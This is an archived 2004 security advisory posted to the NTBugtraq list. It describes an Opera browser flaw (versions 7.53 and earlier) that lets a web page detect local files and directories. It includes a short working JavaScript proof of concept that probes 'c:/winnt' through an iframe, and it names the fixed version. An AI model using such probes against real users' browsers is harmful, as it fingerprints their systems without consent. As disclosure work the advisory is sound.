Opera Local File/Directory Detection (GM#009-OP)

From: GreyMagic Software (security_at_GREYMAGIC.COM)
Date: 08/17/04

  • Next message: Russ: "Re: XP SP2 and Group Policy"
    Date:         Tue, 17 Aug 2004 14:50:30 +0200
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    GreyMagic Security Advisory GM#009-OP
    =====================================

    By GreyMagic Software, 17 Aug 2004.

    Available in HTML format at
    http://www.greymagic.com/security/advisories/gm009-op/.

    Topic: Opera Local File/Directory Detection.

    Discovery date: 04 Aug 2004.

    Affected applications:
    ======================

    Opera 7.53 and prior on Windows, Linux and Mac.

    Introduction:
    =============

    While working on a proof-of-concept exploit for the previous Opera advisory
    [1] we needed to find a way to detect the victim's system root directory, in
    order to locate a specific resource that's required for exploitation.

    [1] http://www.greymagic.com/security/advisories/gm008-op/

    Discussion:
    ===========

    After a bit of investigation, we found that we can easily determine whether
    a directory (or file) exists or not.

    When a non-existent file or directory is assigned to an iframe, an error is
    thrown to the user and the actual location of the iframe does not change.

    This situation can easily be detected by an attacker using an accessible
    iframe (within the same domain). By changing its URL to the location of a
    file or directory and then checking whether an error is thrown when trying
    to access its DOM, the attacker can determine whether the resource exists.

    Exploit:
    ========

    The following sample code determines whether the directory "c:/winnt"
    exists:

    <iframe src="blank.html"></iframe>
    <script type="text/javascript">
    onload=function () {
    var sLocal="c:/winnt";
    frames[0].location.href=sLocal;
    setTimeout(
    function () {
    try {
    frames[0].document;
    alert(sLocal+" does not exists.");
    } catch (oErr) {
    alert(sLocal+" exists.");
    }
    },
    250
    );
    }
    </script>

    An attacker is likely to run this against a group of directories in order to
    find the right one or determine whether specific programs are installed.

    Demonstration:
    ==============

    Proof-of-concept demonstrations of this issue can be found in our previous
    Opera advisory, at http://www.greymagic.com/security/advisories/gm008-op/.

    Solution:
    =========

    Update to Opera 7.54.

    One of the changes in Opera 7.54 was to completely block access to the
    file:// protocol from non-local URLs. That change also happens to protect
    against this vulnerability.

    Tested on:
    ==========

    Opera 7.52.
    Opera 7.53.

    Disclaimer:
    ===========

    The information in this advisory and any of its demonstrations is provided
    "as is" without warranty of any kind.

    GreyMagic Software is not liable for any direct or indirect damages caused
    as a result of using the information or demonstrations provided in any part
    of this advisory.

    - Copyright 2004 GreyMagic Software.

    -----
    NTBugtraq Editor's Note:

    Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you'll have to copy their email address out of the message and place it in your TO: field.
    -----


  • Next message: Russ: "Re: XP SP2 and Group Policy"

    Relevant Pages

    • Opera: Location, Location, Location (GM#008-OP)
      ... Opera 7.53 and prior on Windows, ... The advisory depicted several flaws in Opera's ... write-access to objects on the victim window. ... GreyMagic Software is not liable for any direct or indirect damages caused ...
      (Bugtraq)
    • [VulnWatch] Opera: Location, Location, Location
      ... Opera 7.53 and prior on Windows, ... The advisory depicted several flaws in Opera's ... write-access to objects on the victim window. ... GreyMagic Software is not liable for any direct or indirect damages caused ...
      (VulnWatch)
    • [Full-Disclosure] Opera: Location, Location, Location
      ... Opera 7.53 and prior on Windows, ... The advisory depicted several flaws in Opera's ... write-access to objects on the victim window. ... GreyMagic Software is not liable for any direct or indirect damages caused ...
      (Full-Disclosure)
    • Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera
      ... who replied to my previous advisory. ... All they mostly ignore such holes, all they don't count DoS as ... Only one time Microsoft informed me about fixing DoS hole in Outlook - even they called it stability issue they informed me after they released a patch for it (which was serious approach, but not Microsoft for IE, nor other vendors use such approach for DoS holes in browsers). ... Explorer, Chrome and Opera ...
      (Bugtraq)
    • Several javascript vulnerabilities in Opera
      ... Several javascript vulnerabilities in Opera ... This Advisory is Copyright 2001 Georgi Guninski. ... In some cases cookies and links in the cahe/history may containg sensitive information ...
      (Bugtraq)